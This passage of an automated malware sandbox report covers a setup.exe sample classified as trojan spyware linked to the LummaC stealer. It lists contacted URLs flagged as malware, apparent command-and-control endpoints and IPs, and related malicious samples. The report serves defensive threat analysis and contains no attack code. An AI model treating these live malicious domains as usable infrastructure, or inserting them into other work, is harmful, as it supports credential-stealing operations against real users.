                                    https://duckduckgo.com/chrome_newtabsetup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://regularlavhis.click/api$setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://crl.microsoft6asetup.exe, 00000000.00000003.1942277987.000000000123E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://regularlavhis.click/Ysetup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://crl.microsoftsetup.exe, 00000000.00000003.1900019826.000000000123E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001277000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://regularlavhis.click/jhsetup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://cegu.shop/setup.exe, 00000000.00000003.2180345766.0000000001289000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141767199.0000000001289000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://dfgh.online/invoker.php?compName=setup.exe, 00000000.00000002.4141521913.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4142246007.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2592829563.000000000121F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141655257.0000000001220000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4142309121.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://regularlavhis.click/Misetup.exe, 00000000.00000003.2593186194.000000000129D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141805946.000000000129D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17setup.exe, 00000000.00000003.1914260349.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1901190667.0000000003C73000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1914433684.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1914108419.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1901273060.0000000003C27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://regularlavhis.click/VIScsetup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://ocsp.starfieldtech.com/0Dsetup.exefalse
                                                    		high
                                                    http://crl.thawte.com/ThawteTimestampingCA.crl0setup.exefalse
                                                      		high
                                                      http://x1.c.lencr.org/0setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://x1.i.lencr.org/0setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installsetup.exe, 00000000.00000003.1901273060.0000000003C02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsetup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://regularlavhis.click/piGWsetup.exe, 00000000.00000003.1900019826.000000000123E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://regularlavhis.click/busetup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://regularlavhis.click/obsetup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://klipvumisui.shop/int_clp_sha.txtf1setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://crl.starfieldtech.com/repository/sfsroot.crl0Psetup.exefalse
                                                                		high
                                                                https://support.mozilla.org/products/firefoxgro.allsetup.exe, 00000000.00000003.1928046480.0000000003CFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://klipvumisui.shop/int_clp_sha.txtsetup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://regularlavhis.click/apihsetup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://regularlavhis.click/pi:setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icosetup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://regularlavhis.click/lasetup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://ocsp.thawte.com0setup.exefalse
                                                                        		high
                                                                        https://regularlavhis.click/bubsetup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://ocsp.rootca1.amazontrust.com0:setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://regularlavhis.click/pisetup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016setup.exe, 00000000.00000003.1914260349.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1901190667.0000000003C73000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1914433684.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1914108419.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1901273060.0000000003C27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://regularlavhis.click/laKsetup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                http://certificates.starfieldtech.com/repository/1604setup.exefalse
                                                                                  		high
                                                                                  https://www.ecosia.org/newtab/setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.symauth.com/cps0(setup.exefalse
                                                                                      		high
                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brsetup.exe, 00000000.00000003.1928046480.0000000003CFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cegu.shop/8574262446/ph.txtebKit/537.36setup.exe, 00000000.00000002.4142166098.00000000031DA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://ac.ecosia.org/autocomplete?q=setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://regularlavhis.click/Mi6asetup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2180534792.000000000129C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          http://crl.starfieldtech.com/repository/0setup.exefalse
                                                                                            		high
                                                                                            http://www.symauth.com/rpa00setup.exefalse
                                                                                              		high
                                                                                              http://multicommander.com/updates/version.xmlsetup.exefalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://regularlavhis.click/apiPsetup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://support.microsofsetup.exe, 00000000.00000003.1901190667.0000000003C75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://regularlavhis.click/setup.exe, 00000000.00000003.1900019826.000000000123E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001277000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://regularlavhis.click/jhPsetup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://cegu.shop/2setup.exe, 00000000.00000003.2180345766.0000000001289000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141767199.0000000001289000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplessetup.exe, 00000000.00000003.1901273060.0000000003C02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://cegu.shop/8574262446/ph.txtksetup.exe, 00000000.00000002.4141767199.0000000001289000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      104.21.96.1
                                                                                                      		regularlavhis.clickUnited States
                                                                                                      		13335CLOUDFLARENETUStrue
                                                                                                      185.161.251.21
                                                                                                      		cegu.shopUnited Kingdom
                                                                                                      		5089NTLGBfalse

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1584823
                                                                                                      Start date and time:2025-01-06 15:39:10 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 8m 4s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:5
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:setup.exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@2/2
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 96%
                                                                                                      • Number of executed functions: 44
                                                                                                      • Number of non-executed functions: 280
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Override analysis time to 240s for sample files taking high CPU consumption

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      09:40:21API Interceptor9x Sleep call for process: setup.exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      104.21.96.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                      • pelisplus.so/administrator/index.php
                                                                                                      Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.mffnow.info/1a34/
                                                                                                      185.161.251.21Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                        installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                            Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                              setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                  Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse

                                                                                                                        Domains

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        cegu.shopSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21

                                                                                                                        ASNs

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        NTLGBhttps://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyqlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 194.168.231.153
                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 185.161.251.21
                                                                                                                        CLOUDFLARENETUSsetup.msiGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.21.32.152
                                                                                                                        https://sendbot.me/mousse-w0fysl7Get hashmaliciousUnknownBrowse
                                                                                                                        • 104.16.79.73
                                                                                                                        http://gleapis.com/Get hashmaliciousUnknownBrowse
                                                                                                                        • 104.17.25.14
                                                                                                                        SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 188.114.97.3
                                                                                                                        http://jennadewanunwrapped.netGet hashmaliciousUnknownBrowse
                                                                                                                        • 188.114.97.3
                                                                                                                        http://103-198-26-128.hinet-ip.hinet.net/wp/plugins/Tracking/click/php/SuperTracking.html#UUJWakY1bVdkWlZQejIwbVl3cDFHb2haOENXZVhYZlpLTUNSU2x1eEVCdGJtbVhKT0ZWNkVTNjlQSXJDLzI3ekErVVlzTkFZbkh5T29jeG1LcWM4YkJUekd2M2h4amIxRWZ4am4va3cvOVk9Get hashmaliciousUnknownBrowse
                                                                                                                        • 172.66.0.145
                                                                                                                        Profile Illustrations and Technical Specifications for This System1.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.21.80.1
                                                                                                                        fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        anrek.mp4.htaGet hashmaliciousLummaC StealerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        title.mp4.htaGet hashmaliciousLummaC, PureLog Stealer, zgRATBrowse
                                                                                                                        • 172.67.208.58

                                                                                                                        JA3 Fingerprints

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        • 185.161.251.21
                                                                                                                        anrek.mp4.htaGet hashmaliciousLummaC StealerBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        • 185.161.251.21
                                                                                                                        title.mp4.htaGet hashmaliciousLummaC, PureLog Stealer, zgRATBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        • 185.161.251.21
                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        • 185.161.251.21
                                                                                                                        PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        • 185.161.251.21
                                                                                                                        un30brGAKP.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.96.1
                                                                                                                        • 185.161.251.21
                                                                                                                        Patcher_I5cxa9AN.exeGet hashmaliciousLummaCBrowse
                                                                                                                        • 104.21.96.1
